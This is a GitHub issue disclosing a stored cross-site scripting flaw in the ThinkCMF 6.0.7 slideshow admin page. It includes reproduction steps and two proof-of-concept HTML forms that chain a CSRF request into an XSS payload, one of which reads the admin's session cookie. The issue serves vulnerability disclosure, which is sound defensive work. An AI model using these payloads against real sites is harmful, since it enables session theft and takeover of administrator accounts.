Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS Stored in the Slideshow Management component. #737

Closed
AleDiBen opened this issue Sep 14, 2022 · 0 comments
Closed

XSS Stored in the Slideshow Management component. #737

AleDiBen opened this issue Sep 14, 2022 · 0 comments
Labels

Comments

@AleDiBen
Copy link

AleDiBen commented Sep 14, 2022

ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.

Here are the steps to reproduce the issue.

  1. A remote user tricks the logged in administrator into visiting a malicious site.
  2. The administrator opens the page containing the CSRF payload, injecting the XSS payload into the Slideshow Management (幻灯片管理) page, in the Name (名称) field.
  3. The administrator opens the Slideshow Management (幻灯片管理) page, clicks on Admin Page (管理页面) button and the stored payload is executed.

Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID).

These are the PoCs I used.

<html>
  <body>
  <h1>CSRF - XSS Stored PoC</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/slide/addPost.html" method="POST">
      <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;0&#41;&gt;" />
      <input type="hidden" name="remark" value="XSS&#32;Stored" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>
<html>
  <body>
  <h1>CSRF - XSS Stored PoC</h1>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin/slide/addPost.html" method="POST">
      <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;document.cookie&#41;&gt;" />
      <input type="hidden" name="remark" value="XSS&#32;Stored" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      //document.forms[0].submit();
    </script>
  </body>
</html>

Screenshots

XSSPayload
Fig. 1: CSRF that contains an XSS payload


XSSPocExecuted
Fig.2: CSRF payload triggered


XSSPayloadInjected
Fig. 3: XSS payload injected


XSSPayloadExecuted
Fig. 4: XSS triggered


XSSStoredCookieExfiltration
Fig. 5: Reading the PHPSESSID cookie

thinkcmf pushed a commit that referenced this issue Oct 28, 2022
thinkcmf pushed a commit that referenced this issue Oct 28, 2022
* fix github (#736)
* fix github (#737)
* 升级第三方包
* 优化后台验证码逻辑
* !34 update vendor/thinkcmf/cmf-app/src/admin/model/SlideItemModel.php.
* fix #I5MRC5
* phpquery
* Merge branch '6.0' of https://gitee.com/thinkcmf/ThinkCMF into 6.0
* 新增加`cmf_together`函数
* 本站用户页面操作启用,优化提示
* 管理员 添加 时间优化
* 修复语言包
* Merge branch '6.0' of https://gitee.com/thinkcmf/ThinkCMF into 6.0
* 修复幻灯片页面语言包缺失
* 修复github issues #722
* 6.0.8开工
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants